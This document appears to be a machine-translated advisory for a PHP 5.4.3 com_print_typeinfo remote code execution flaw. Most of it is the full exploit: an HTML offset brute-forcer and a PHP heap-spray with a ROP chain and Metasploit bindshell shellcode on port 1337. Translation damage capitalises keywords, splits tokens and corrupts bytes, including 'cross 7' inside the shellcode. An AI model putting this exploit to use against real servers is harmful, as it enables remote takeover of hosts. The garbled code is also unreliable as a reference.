PHP 'com _ print_typeinfo () 'Remote Code Execution Vulnerability

Release date:
Updated on:

Affected Systems:
PHP 5.4.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53621

PHP is an embedded HTML language. PHP is similar to Microsoft's ASP. It is a script language that is executed on the server side and embedded in HTML documents, the language style is similar to the C language and is widely used by many website programmers.

The function com_print_typeinfo in PHP 5.4.3 has a remote vulnerability. When the php engine executes malicious code containing shell code that can be bound to a port, attackers can exploit this vulnerability to execute arbitrary code on the affected network server.

<* Source: 0in (0in.email@gmail.com)
Condis

Link: http://isc.sans.edu/diary.html? Storyid = 13255.
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

0in (0in.email@gmail.com) provides the following test methods:

// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in (dot) email (at) gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)

==============================
Offset-brute.html
==============================

<Html> <body>
<Title> 0 day </title>
<Center>
<Font size = 7> PHP 5.4.3 0day by 0in & cOndis </font> <br>
<Textarea rows = 50 cols = 50 id = "log"> & lt;/textarea & gt;
</Center>
<Script>
Function sleep (milliseconds ){
Var start = new Date (). getTime ();
For (var I = 0; I <1e7; I ++ ){
If (new Date (). getTime ()-start)> milliseconds ){
Break;
}
}
}
Function makeRequest (url, parameters)
{
Var xmlhttp = new XMLHttpRequest ();
If (window. XMLHttpRequest ){
Xmlhttp = new XMLHttpRequest ();
If (xmlhttp. overrideMimeType ){
Xmlhttp. overrideMimeType ('text/xml ');
}
} Else if (window. ActiveXObject ){
// IE
Try {xmlhttp = new ActiveXObject ("Msxml2.XMLHTTP ");}
Catch (e ){
Try {xmlhttp = new ActiveXObject ("Microsoft. XMLHTTP ");}
Catch (e ){}
}
}

If (! Xmlhttp ){
Alert ('Giving up :( Cannot create an XMLHTTP instance ');
Return false;
}

Xmlhttp. open ("GET", url, true );
Xmlhttp. send (null );
Return true;
}
Test = document. getElementById ("log ");
For (offset = 0; offset <300; offset ++)
{
Log. value + = "Trying offset:" + offset + "\ r \ n ";
MakeRequest ("0day. php? Offset = "+ offset );
Sleep (500 );
}

</Script> </body>

 

==============================
0 day. php
==============================

<? Php

$ Spray = str_repeat ("\ x90", 0x200 );
$ Offset = $ _ GET ['offset'];
// 775DF0Da # add esp, 10 # RETN ** [ole32.dll]
$ Spray = substr_replace ($ spray, "\ xda \ xf0 \ x5d \ x77", (strlen ($ spray) *-1, (strlen ($ spray )) *-1 );
//:> 0x048d0030
$ Spray = substr_replace ($ spray, pack ("L", 0x048d0030 + $ offset), (strlen ($ spray)-0x8) *-1, (strlen ($ spray) *-1 );

// 0x7752ae9f (RVA: 0x0005ae7f): # xchg eax, ESP # mov ecx, 468B0000 # or al, 3 # RETN [ole32.dll]
$ Spray = substr_replace ($ spray, "\ x9f \ xae \ x52 \ x77", (strlen ($ spray)-0x10) *-1, (strlen ($ spray) *-1 );

// Adress of VirtualProtect 0x7c801ad4
$ Spray = substr_replace ($ spray, "\ xd4 \ x1a \ x80 \ x7c", (strlen ($ spray)-0x14) *-1, (strlen ($ spray) *-1 );

// LPVOID lpAddress = 0x048d0060
$ Spray = substr_replace ($ spray, pack ("L", 0x048d0060 + $ offset), (strlen ($ spray)-0x1c) *-1, (strlen ($ spray )) *-1 );

// SIZE_T dwSize = 0x01000000
$ Spray = substr_replace ($ spray, "\ x00 \ x00 \ x10 \ x00", (strlen ($ spray)-0x20) *-1, (strlen ($ spray) *-1 );

// DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0
$ Spray = substr_replace ($ spray, "\ x40 \ x00 \ x00 \ x00", (strlen ($ spray)-0x24) *-1, (strlen ($ spray) *-1 );
// _ Out PDWORD lpflOldProtect = 0x04300070 | 0x105240000

// 0x048d0068
$ Spray = substr_replace ($ spray, pack ("L", 0x048d0068 + $ offset), (strlen ($ spray)-0x28) *-1, (strlen ($ spray) *-1 );

// 0x77dfe8b4: # xor eax, EAX # add esp, 18 # inc eax # pop ebp # RETN 0C ** [ADVAPI32.dll]
$ Spray = substr_replace ($ spray, "\ xb4 \ xe8 \ xdf \ x77", (strlen ($ spray)-0x18) *-1, 4 );
// Ret Address = 0x048d0080
$ Spray = substr_replace ($ spray, pack ("L", 0x048d0080 + $ offset), (strlen ($ spray)-0x48) *-1, 4 );

 

$ Stacktrack = "\ xbc \ x0c \ xb0 \ xc0 \ x00 ";
// Universal win32 bindshell on port 1337 from metasploit
$ Shellcode = $ stacktrack. "\ x33 \ xc9 \ x83 \ xe9 \ xb0 ".
"\ X81 \ xc4 \ xd0 \ xfd \ xff ".
"\ Xd9 \ xee \ xd9 \ x74 \ x24 \ xf4 \ x5b \ x81 \ x73 \ x13 \ x1d ".
"\ Xcc \ x32 \ x69 \ x83 \ xeb \ xfc \ xe2 \ xf4 \ xe1 \ xa6 \ xd9 \ x24 \ xf5 \ x35 \ xcd \ x96 ".
"\ Xe2 \ xac \ xb9 \ x05 \ x39 \ xe8 \ xb9 \ x2c \ x21 \ x47 \ x4e \ x6c \ x65 \ xcd \ xdd \ xe2 ".
"\ X52 \ xd4 \ xb9 \ x36 \ x3d \ xcd \ xd9 \ x20 \ x96 \ xf8 \ xb9 \ x68 \ xf3 \ xfd \ xf2 \ xf0 ".
"\ Xb1 \ x48 \ xf2 \ x1d \ x1a \ x0d \ xf8 \ x64 \ x1c \ x0e \ xd9 \ x9d \ x26 \ x98 \ x16 \ x41 ".
"\ X68 \ x29 \ xb9 \ x36 \ x39 \ xcd \ xd9 \ x0f \ x96 \ xc0 \ x79 \ xe2 \ x42 \ xd0 \ x33 \ x82 ".
"\ X1e \ xe0 \ xb9 \ xe0 \ x71 \ xe8 \ x2e \ x08 \ xde \ xfd \ xe9 \ x0d \ x96 \ x8f \ x02 \ xe2 ".
"\ X5d \ xc0 \ xb9 \ x19 \ x01 \ x61 \ xb9 \ x29 \ x15 \ x92 \ x5a \ xe7 \ x53 \ xc2 \ xde \ x39 ".
"\ Xe2 \ x1a \ x54 \ x3a \ x7b \ xa4 \ x01 \ x5b \ x75 \ xbb \ x41 \ x5b \ x42 \ x98 \ xcd \ xb9 ".
"\ X75 \ x07 \ xdf \ x95 \ x26 \ x9c \ xcd \ xbf \ x42 \ x45 \ xd7 \ x0f \ x9c \ x21 \ x3a \ x6b ".
"\ X48 \ xa6 \ x30 \ x96 \ xcd \ xa4 \ xeb \ x60 \ xe8 \ x61 \ x65 \ x96 \ xcb \ x9f \ x61 \ x3a ".
"\ X4e \ x9f \ x71 \ x3a \ x5e \ x9f \ xcd \ xb9 \ x7b \ xa4 \ x37 \ x50 \ x7b \ x9f \ xbb \ x88 ".
"\ X88 \ xa4 \ x96 \ x73 \ x6d \ x0b \ x65 \ x96 \ xcb \ xa6 \ x22 \ x38 \ x48 \ x33 \ xe2 \ x01 ".
"\ Xb9 \ x61 \ x1c \ x80 \ x4a \ x33 \ xe4 \ x3a \ x48 \ x33 \ xe2 \ x01 \ xf8 \ x85 \ xb4 \ x20 ".
"\ X4a \ x33 \ xe4 \ x39 \ x49 \ x98 \ x67 \ x96 \ xcd \ x5f \ x5a \ x8e \ x64 \ x0a \ x4b \ x3e ".
"\ Xe2 \ x1a \ x67 \ x96 \ xcd \ xaa \ x58 \ x0d \ x7b \ xa4 \ x51 \ x04 \ x94 \ x29 \ x58 \ x39 ".
"\ X44 \ xe5 \ xfe \ xe0 \ xfa \ xa6 \ x76 \ xe0 \ xff \ xfd \ xf2 \ x9a \ xb7 \ x32 \ cross 7 \ x44 ".
"\ Xe3 \ x8e \ x1e \ xfa \ x90 \ xb6 \ x0a \ xc2 \ xb6 \ x67 \ x5a \ x1b \ xe3 \ x7f \ x24 \ x96 ".
"\ X68 \ x88 \ xcd \ xbf \ x46 \ x9b \ x60 \ x38 \ x4c \ x9d \ x58 \ x68 \ x4c \ x9d \ x67 \ x38 ".
"\ Xe2 \ x1c \ x5a \ xc4 \ xc4 \ xc9 \ xfc \ x3a \ xe2 \ x1a \ x58 \ x96 \ xe2 \ xfb \ xcd \ xb9 ".
"\ X96 \ x9b \ xce \ xea \ xd9 \ xa8 \ xcd \ xbf \ x4f \ x33 \ xe2 \ x01 \ xf2 \ x02 \ xd2 \ x09 ".
"\ X4e \ x33 \ xe4 \ x96 \ xcd \ xcc \ x32 \ x69 ";

$ Spray = substr_replace ($ spray, $ shellcode, (strlen ($ spray)-0x50) *-1, (strlen ($ shellcode )));
$ Fullspray = "";
For ($ I = 0; $ I <0x4b00; $ I ++)
{
$ Fullspray. = $ spray;
}
$ J = array ();
$ E = array ();
$ B = array ();
$ A = array ();
$ C = array ();

Array_push ($ j, $ fullspray );
Array_push ($ e, $ fullspray. "W ");
Array_push ($ B, $ fullspray. "");
Array_push ($ a, $ fullspray. "S ");
Array_push ($ c, $ fullspray ."! ");

$ VVar = new VARIANT (0x048d0038 + $ offset );
// Shoot him
Com_print_typeinfo ($ vVar); // CRASH-> 102F3986 FF50 10 call dword ptr ds: [EAX + 10]

Echo $ arr;

Echo $ spray;

?>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

PHP
---
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.php.net